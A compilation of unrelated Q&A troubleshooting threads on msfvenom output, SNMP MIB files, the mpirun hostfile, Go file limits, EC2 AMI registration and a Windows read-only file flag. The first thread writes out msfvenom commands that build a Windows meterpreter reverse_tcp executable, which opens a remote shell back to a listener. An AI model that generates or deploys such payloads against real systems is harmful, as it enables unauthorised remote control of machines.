Msfvenom does not produce required payload - metasploit

I am trying to create a Windows payload with msfvenom, but it is not working properly:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe payload.exe
Here is the error that I am getting:
CommandLineToArgvWapr_initialize0123456789.0.0.0.0bogus %pI64dNo host data of that type was foundHost not foundGraceful shutdown in progressWSAStartup not yet calledWinsock version out of rangeNetwork system is unavailableToo many levels of remote in pathStale NFS file handleDisc quota exceededToo many usersToo many processesDirectory not emptyNo route to hostHost is downFile name too longToo many levels of symbolic linksConnection refusedConnection timed outToo many references, can't spliceCan't send after socket shutdownSocket is not connectedSocket is already connectedNo buffer space availableConnection reset by peerSoftware caused connection abortNet connection resetNetwork is unreachableNetwork is downCan't assign requested addressAddress already in useAddress family not supportedProtocol family not supportedOperation not supported on socketSocket type not supportedProtocol not supportedBad protocol optionProtocol wrong type for socketMessage too longDestination address requiredSocket operation on non-socketOperation already in progressOperation now in progressOperation would blockToo many open socketsInvalid argumentBad addressPermission deniedBad file numberInterrupted system callAPR does not understand this error codeError string not specified yetpasswords do not matchThis function has not been implemented on this platformThere is no error, this value signifies an initialized error codeShared memory is implemented using a key systemShared memory is implemented using filesShared memory is implemented anonymouslyCould not find specified socket in poll list.End of file foundMissing parameter for the specified command line optionBad character specified on command linePartial results are valid but processing is incompleteThe timeout specified has expiredThe specified child process is not done executingThe specified child process is done executingThe specified thread is not detachedThe specified thread is detachedYour code just forked, and you are currently 
executing in the parent processYour code just forked, and you are currently executing in the child processInternal errorThe process is not recognized.The given path contained wildcard charactersThe given path is misformatted or contained invalid charactersThe given path was above the root pathThe given path is incompleteThe given path is relativeThe given path is absoluteThe specified network mask is invalid.The specified IP address is invalid.DSO load failedNo shared memory is currently availableNo thread key structure was provided and one was required.No thread was provided and one was required.No socket was provided and one was required.No poll structure was provided and one was required.No lock was provided and one was required.No directory was provided and one was required.No time was provided and one was required.No process was provided and one was required.An invalid socket was returnedAn invalid date has been providedA new pool could not be created.Unrecognized Win32 error code %d\\?\UNC\\\?\CancelIoGetCompressedFileSizeAGetCompressedFileSizeWZwQueryInformationFileGetSecurityInfoGetNamedSecurityInfoAGetNamedSecurityInfoWUNC \GetEffectiveRightsFromAclWntdll.dllshell32ws2_32mswsockadvapi32kernel32VS_VERSION_INFOStringFileInfo040904b00

I think it's because you didn't specify the output argument. Try using the "-o" or the ">" argument.
E.g.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > out.exe
OR
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -o out.exe

Related

How to add variables to MIB files in Linux?

Basically, I have added one variable called "sysFirst" (as shown in the picture below) to the available "RFC1213-MIB.txt" file. After adding the variable, I also validated it using the command
smilint -l 6 -i namelength-32 ./RFC1213-MIB.txt
So I got the following result:
root#pdu:/usr/share/snmp/mibs# smilint -l 6 -i namelength-32 ./RFC1213-MIB.txt
./RFC1213-MIB.txt:15: warning: redefinition of identifier `SNMPv2-SMI::mib-2'
/usr/share/mibs/ietf/SNMPv2-SMI:13: info: previous definition of `mib-2'
./RFC1213-MIB.txt:19: warning: redefinition of identifier `SNMPv2-TC::DisplayString'
/usr/share/mibs/ietf/SNMPv2-TC:53: info: previous definition of `DisplayString'
./RFC1213-MIB.txt:28: warning: redefinition of identifier `SNMPv2-TC::PhysAddress'
/usr/share/mibs/ietf/SNMPv2-TC:87: info: previous definition of `PhysAddress'
./RFC1213-MIB.txt:56: warning: redefinition of identifier `SNMPv2-SMI::transmission'
/usr/share/mibs/ietf/SNMPv2-SMI:14: info: previous definition of `transmission'
./RFC1213-MIB.txt:268: index element `ifIndex' of row `ifEntry' must have a range restriction
./RFC1213-MIB.txt:616: index element `atIfIndex' of row `atEntry' must have a range restriction
./RFC1213-MIB.txt:1308: index element `ipNetToMediaIfIndex' of row `ipNetToMediaEntry' must have a range restriction
./RFC1213-MIB.txt:19: warning: type `DisplayString' has no format specification
./RFC1213-MIB.txt:28: warning: type `PhysAddress' has no format specification
Then, after restarting the SNMP daemon, I observed that it is not reflected in the MIB browser, as shown in the image below.
What could be the reason for the variable not being reflected in the MIB browser?
Any help will be really appreciated.
Whatever MIB files we make, we need to add them to the MIB browser using the "Load MIB" option; normally we can find it under the File option in the menu bar.
After adding them, we can use all the SNMP commands from any device that has the MIB browser.

Slots command in hostfile for mpirun not recognised

I saw another question that seemed similar, "mpirun: token slots not supported", but their solution did not work for me.
I get the error
token slots not supported at this time
when running the command mpirun -hostfile temp.txt hostname
where temp.txt is:
hostname1 slots=2
hostname2 slots=2
I have the mpirun version 2021.5
Release Date: 20211102 (id: 9279b7d62).
It did not work to instead write:
hostname1:2
hostname2:2
In that case the command runs, but it instead uses the number of physical processors that are available, which is the default.
EDIT: I am adding the full output:
[host RAMSES]$ mpirun -hostfile temp.txt hostname
[mpiexec#host] HYD_hostfile_process_tokens (../../../../../src/pm/i_hydra/libhydra/hostfile/hydra_hostfile.c:47): token slots not supported at this time
[mpiexec#host] HYD_hostfile_unique_parse (../../../../../src/pm/i_hydra/libhydra/hostfile/hydra_hostfile.c:232): unable to process token
[mpiexec#host] match_arg (../../../../../src/pm/i_hydra/libhydra/arg/hydra_arg.c:83): match handler returned error
[mpiexec#host] HYD_arg_parse_array (../../../../../src/pm/i_hydra/libhydra/arg/hydra_arg.c:128): argument matching returned error
[mpiexec#host] mpiexec_get_parameters (../../../../../src/pm/i_hydra/mpiexec/mpiexec_params.c:1359): error parsing input array
[mpiexec#host] main (../../../../../src/pm/i_hydra/mpiexec/mpiexec.c:1784): error parsing parameters
So I found that on my version of MPI I had to specify processor placement not in the hostfile, as most of the examples I found do, but rather in the machinefile.
So the new command and file look like:
mpirun -machinefile machine.txt hostname
machine.txt:
host1:2
host2:2

Error during go build/run execution

I've created a simple Go script: https://gist.github.com/kbl/86ed3b2112eb80522949f0ce574a04e3
It fetches some XML from the internet and then starts X goroutines. X depends on the file content. In my case it was 1700 goroutines.
My first execution finished with:
$ go run mathandel1.go
2018/01/27 14:19:37 Get https://www.boardgamegeek.com/xmlapi/boardgame/162152?pricehistory=1&stats=1: dial tcp 72.233.16.130:443: socket: too many open files
2018/01/27 14:19:37 Get https://www.boardgamegeek.com/xmlapi/boardgame/148517?pricehistory=1&stats=1: dial tcp 72.233.16.130:443: socket: too many open files
exit status 1
I've tried to increase ulimit to 2048.
Now I'm getting a different error; the script is the same though:
$ go build mathandel1.go
# command-line-arguments
/usr/local/go/pkg/tool/linux_amd64/link: flushing $WORK/command-line-arguments/_obj/exe/a.out: write $WORK/command-line-arguments/_obj/exe/a.out: file too large
What is causing that error? How can I fix that?
You ran "ulimit 2048", which changed the maximum file size.
From man bash(1), ulimit section:
If no option is given, then -f is assumed.
This means that you have now set the maximum file size to 2048 bytes, which is probably not enough for... anything.
I'm guessing you meant to change the limit for number of open file descriptors. For this, you want to run:
ulimit -n 2048
As for the original error (before changing the maximum file size): you're launching 1700 goroutines, each performing an HTTP GET. Each creates a connection, using a TCP socket. These are covered by the open file descriptor limit.
Instead, you should be limiting the number of concurrent downloads. This can be done with a simple worker pool pattern.
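The worker pool the answer refers to, as an added example that is not part of the original post or the linked gist. It replaces the per-URL HTTP GET with a caller-supplied fetch function so it runs offline; the concurrencyProbe type and the example.invalid URLs are constructed for illustration. The point it shows is that the number of sockets in flight is bounded by the worker count, not by the number of URLs, so the default file descriptor limit is never reached and no ulimit change is needed:

```go
package main

import (
	"fmt"
	"runtime"
	"sync"
	"sync/atomic"
)

// Fetcher stands in for the per-URL download. In the real script this would
// wrap http.Get; here the caller supplies it so the pool can run offline.
type Fetcher func(url string) (int, error)

// fetchAll runs fetch over urls with at most `workers` calls in flight at
// once, so at most `workers` TCP sockets (file descriptors) are open at any
// time. Results and errors are returned positionally, matching urls.
func fetchAll(urls []string, workers int, fetch Fetcher) ([]int, []error) {
	if workers < 1 {
		workers = 1
	}
	jobs := make(chan int)
	results := make([]int, len(urls))
	errs := make([]error, len(urls))

	var wg sync.WaitGroup
	for w := 0; w < workers; w++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			// Each worker pulls indices until the channel is closed; a
			// failed fetch is recorded and the worker moves on.
			for i := range jobs {
				results[i], errs[i] = fetch(urls[i])
			}
		}()
	}
	for i := range urls {
		jobs <- i // blocks until a worker is free: this is the back-pressure
	}
	close(jobs)
	wg.Wait()
	return results, errs
}

// concurrencyProbe is a constructed stand-in for the downloader. It records
// the peak number of simultaneous calls, which is exactly what the open file
// descriptor limit constrains.
type concurrencyProbe struct {
	inFlight int32
	peak     int32
}

func (p *concurrencyProbe) fetch(url string) (int, error) {
	cur := atomic.AddInt32(&p.inFlight, 1)
	defer atomic.AddInt32(&p.inFlight, -1)
	for {
		old := atomic.LoadInt32(&p.peak)
		if cur <= old || atomic.CompareAndSwapInt32(&p.peak, old, cur) {
			break
		}
	}
	runtime.Gosched() // let other workers overlap with this call
	return len(url), nil
}

// Peak returns the highest number of concurrent fetch calls observed.
func (p *concurrencyProbe) Peak() int { return int(atomic.LoadInt32(&p.peak)) }

func main() {
	// Constructed input: the same order of magnitude as the 1700 goroutines
	// in the question, but with a hypothetical host that is never contacted.
	urls := make([]string, 1700)
	for i := range urls {
		urls[i] = fmt.Sprintf("https://example.invalid/boardgame/%d", i)
	}
	probe := &concurrencyProbe{}
	results, errs := fetchAll(urls, 8, probe.fetch)
	failed := 0
	for _, err := range errs {
		if err != nil {
			failed++
		}
	}
	fmt.Printf("fetched %d urls, %d failed, peak concurrency %d (limit 8)\n",
		len(results), failed, probe.Peak())
}
```

With a real http.Client the same bound applies, but note that Go's default transport keeps idle connections open for reuse, so share one client across the workers rather than creating one per request; otherwise closed-but-lingering connections can still count against the descriptor limit.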

Error in registering EC2 Instance-backed store

In trying to register an AMI on Amazon EC2 with the following command:
ec2-register -n my-ami-prefix --cert /mnt/cert-aaa.pem --private-key /mnt/pk-bbb.pem mys3bucke/my-ami-prefix.manifest.xml
I get the following error:
Client.InvalidManifest: Invalid block device mapping: Invalid virtual name 'ebs5'
The mappings generated in the manifest are as follows:
<mapping><virtual>ami</virtual><device>sda1</device></mapping>
<mapping><virtual>ebs1</virtual><device>/dev/sdh</device></mapping>
<mapping><virtual>ebs5</virtual><device>/dev/sdi</device></mapping>
<mapping><virtual>ephemeral0</virtual><device>sdb</device></mapping>
<mapping><virtual>ephemeral1</virtual><device>sdc</device></mapping>
<mapping><virtual>ephemeral2</virtual><device>sdd</device></mapping>
<mapping><virtual>ephemeral3</virtual><device>sde</device></mapping>
<mapping><virtual>root</virtual><device>/dev/sda1</device></mapping>
According to the help text of ec2-bundle-vol, the following are valid mapping names:
"ami": denotes the root file system device, as seen by the instance.
"root": denotes the root file system device, as seen by the kernel.
"swap": denotes the swap device, if present.
"ephemeralN": denotes Nth ephemeral store; N is a non-negative integer.
So, why is it creating "ebs" names for some of the mappings? Why is it giving these two devices the "ebs" name instead of the "ephemeral" name like the rest? When I run "fdisk -l", all the devices except the last have the same size. Can I go into the manifest and rename them to "ephemeral14" and "ephemeral15"?
I added this to the bundle command, and at least it registered the AMI:
-B ami=sda1,root=/dev/sda1,ephemeral0=sdb,ephemeral1=sdc,ephemeral2=sdd,ephemeral3=sde,ephemeral4=sdh,ephemeral5=sdi

Why is the read-only attribute set (sometimes) for files created by my service?

NOTE: This is a complete re-write of this question. I'd previously conflated some ACL issues with the problem I'm hunting, which is probably why there were no answers.
I have a Windows service that uses the standard open/close/write routines to write a log file (it reads stuff from a pipe and stuffs it into the log). A new log file is opened each day at midnight. The system is Windows XP Embedded.
The service runs as the Local System service (CreateService with NULL for the user).
When the service initially starts up, it creates a log file and writes to it with no problems. At this point everything is OK, and you can restart the service (or the computer) with no issues.
However, at midnight (when the day changes), the service creates a new log file and writes to it. The funny thing is, this new log file has the 'read only' flag set. That's a problem because if the service (or the computer) restarts, the service can no longer open the file for writing.
Here's the relevant information from the system with the problem having already happened:
Directory of C:\bbbaudit
09/16/2009 12:00 AM <DIR> .
09/16/2009 12:00 AM <DIR> ..
09/16/2009 12:00 AM 437 AU090915.ADX
09/16/2009 12:00 AM 62 AU090916.ADX
attrib c:\bbbaudit\*
A C:\bbbaudit\AU090915.ADX <-- old log file (before midnight)
A R C:\bbbaudit\AU090916.ADX <-- new log file (after midnight)
cacls output:
C:\ BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
CREATOR OWNER:(OI)(CI)(IO)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(special access:)
FILE_APPEND_DATA
BUILTIN\Users:(CI)(IO)(special access:)
FILE_WRITE_DATA
Everyone:R
C:\bbbaudit BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
CFN3\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
Here's the code I use to open/create the log files:
#include <fcntl.h>   // O_WRONLY, O_APPEND, O_CREAT, O_EXCL
#include <io.h>      // open() in the VC runtime

// Returns a descriptor for fname, creating the file if it does not exist.
// alreadyExists reports which of the two open() calls succeeded.
static int open_or_create_file(char *fname, bool &alreadyExists)
{
    int fdes;
    // try to create new file, fail if it already exists
    // (O_CREAT is passed here without a third pmode argument)
    alreadyExists = false;
    fdes = open(fname, O_WRONLY | O_APPEND | O_CREAT | O_EXCL);
    if (fdes < 0)
    {
        // try to open existing, don't create new file
        alreadyExists = true;
        fdes = open(fname, O_WRONLY | O_APPEND);
    }
    return fdes;
}
I'm having real trouble figuring out how the file is getting that read-only flag on it. Anyone who can give me a clue or a direction, I'd greatly appreciate it.
Compiler is VC 6 (Yeah, I know, it's so far out of date it isn't funny. Until you realize that we've just now upgraded to XPE from NT 3.51).
The Microsoft implementation of open() has an optional third argument 'pmode', which is required to be present when the second argument 'oflag' includes the O_CREAT flag. The pmode argument specifies the file permission settings, which are set when the new file is closed for the first time. Typically you would pass S_IREAD | S_IWRITE for pmode, resulting in an ordinary read/write file.
In your case you have specified O_CREAT but omitted the third argument, so open() has used whatever value happened to be on the stack at the third argument position. The value of S_IWRITE is 0x0080, so if the value in the third argument position happened to have bit 7 clear, it would result in a read-only file. The fact that you got a read-only file only some of the time, is consistent with stack junk being passed as the third argument.
Below is the link for the Visual Studio 2010 documentation for open(). This aspect of the function's behaviour has not changed since VC 6.
http://msdn.microsoft.com/en-us/library/z0kc8e3z.aspx
Well, I have no idea what the underlying problem is with the 'open' APIs in this case. In order to 'fix' the problem, I ended up switching to using the Win32 APIs for file management (CreateFile, WriteFile, CloseHandle).
